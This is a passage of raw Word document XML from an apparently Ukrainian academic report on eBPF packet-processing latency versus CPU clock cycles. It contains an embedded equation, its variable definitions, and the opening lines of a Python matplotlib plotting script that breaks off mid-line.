      <w:r w:rsidR="00C31EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> побудувати кілька графіків, які ілюструють залежність різних параметрів (</w:t>
      </w:r>
      <w:r w:rsidR="00E21649">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>затримка</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E21649">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> пропускна здатність, н</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>авантаження на CPU) від</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> зміни параметрів, таких як тактова</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> частота процесора або кількість оброблених</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> пакетів</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2A6E" w:rsidRPr="00BC6B10" w:rsidRDefault="005B2A6E" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для проведення даних дос</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ліджень мною було використано </w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>методи аналізу даних, інструменти програмування, зокрема Python, та бібліотеки для візуалізації,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> такі як </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Matplotlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Seaborn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”, - [26]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C076D" w:rsidRPr="003C7FE5" w:rsidRDefault="001C076D" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Графік затримки обробки пакета</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="56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45pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1793511351" r:id="rId25"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C076D" w:rsidRPr="003C7FE5" w:rsidRDefault="00787E32" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Цей графік показує, як змінюється пакет підтримки обробки залежно від кількості тактів процесора, необхідних для виконання програми </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, при фіксованій тактовій частоті процесора</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="600" w:dyaOrig="440">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:30pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1793511352" r:id="rId27"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787E32" w:rsidRDefault="00787E32" w:rsidP="001C076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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787E32" w:rsidRPr="003C7FE5" w:rsidRDefault="00787E32" w:rsidP="00787E32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="center" w:pos="4678"/>
          <w:tab w:val="right" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-36"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="859">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:1in;height:42.85pt" o:ole="">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1793511353" r:id="rId29"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787E32" w:rsidRDefault="00787E32" w:rsidP="00787E3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де:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787E32" w:rsidRPr="00787E32" w:rsidRDefault="00787E32" w:rsidP="00787E32">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="620" w:dyaOrig="440">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:30.85pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId30" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1793511354" r:id="rId31"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>кількі</w:t>
      </w:r>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ст</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="00787E32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> тактів процесора</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787E32" w:rsidRPr="00787E32" w:rsidRDefault="00787E32" w:rsidP="00787E32">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="600" w:dyaOrig="440">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:30pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1793511355" r:id="rId32"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2,5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ГГц</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="00CC6CB6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>```python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>numpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as np</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>matplotlib.pyplot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Данні</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="0024039E" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C_eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
